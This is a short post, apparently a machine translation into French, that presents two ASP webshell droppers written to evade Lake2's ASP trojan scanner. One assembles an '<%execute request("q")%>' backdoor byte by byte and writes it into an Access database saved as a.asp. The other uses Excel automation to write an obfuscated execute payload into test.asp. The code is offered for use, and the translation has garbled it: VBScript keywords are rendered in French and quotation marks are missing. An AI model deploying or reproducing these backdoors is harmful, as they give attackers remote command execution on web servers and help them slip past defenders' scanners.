Deux chevaux de Troie ASP non conventionnels ont été écrits par Hanxiaolian pour éviter l'assistant de gestion des webmasters ASP de Lake2.
Écrit pour éviter l'assistant de gestion des webmasters Lake2 ASP...
1. Un poney qui contourne l'analyse du cheval de Troie Lake2 Asp
Copiez le code comme suit :
<%
définir c = CreateObject (ADOX.Catalog)
c.create(Provider=Microsoft.Jet.OLEDB.4.0;Data Source=&Server.MapPath(a.asp))
définir c = Rien
c&Server.MapPath(a.asp)
définir conn=server.createobject(Adodb.Connection)
conn.open connstr
conn.execute (créer une table nomm (nomuma oleobject))
définir rs=server.createobject(adodb.recordset)
sql=SELECT * FROM nomm
rs.open sql, conn, 1,3
rs.addnew
rs (nomuma).appendchunk(chrB(asc(<))&chrB(asc(%))&chrB(asc (e))&chrB
(asc(x))&chrB(asc(e))&chrB(asc(c))&chrB(asc (u))&chrB(asc(t))&chrB(asc
(e))&chrB(asc(+))&chrB(asc (r))&chrB(asc(e))&chrB(asc(q))&chrB(asc
(u))&chrB(asc (e))&chrB(asc(s))&chrB(asc(t))&chrB(asc(())&chrB(34)
&chrB(asc(q))&chrB(34)&chrB(asc()))&chrB(asc(%))& chrB(asc(>)))
rs.mise à jour
rs.fermer
définir rs = rien
connexion.fermer
définir conn = rien
%>
Version 2.xls asp webshell
Copiez le code comme suit :
<%
Définir xlA = Server.CreateObject (Excel.Application)
xlA.Visible = Faux
xlA.Workbooks.Add
Définir xlWorksheet = xlA.Worksheets(1)
xlWorksheet.Cells(1,1).Value = <%ex&ec&ute(request(q))+chr(37)+>
'strFile = d:/test.asp
strFile = Server.MapPath(test.asp)
xlWorkSheet.SaveAs strFile
xlA.Quitter
Définir xlWorksheet = Rien
Définir xlA = Rien
%>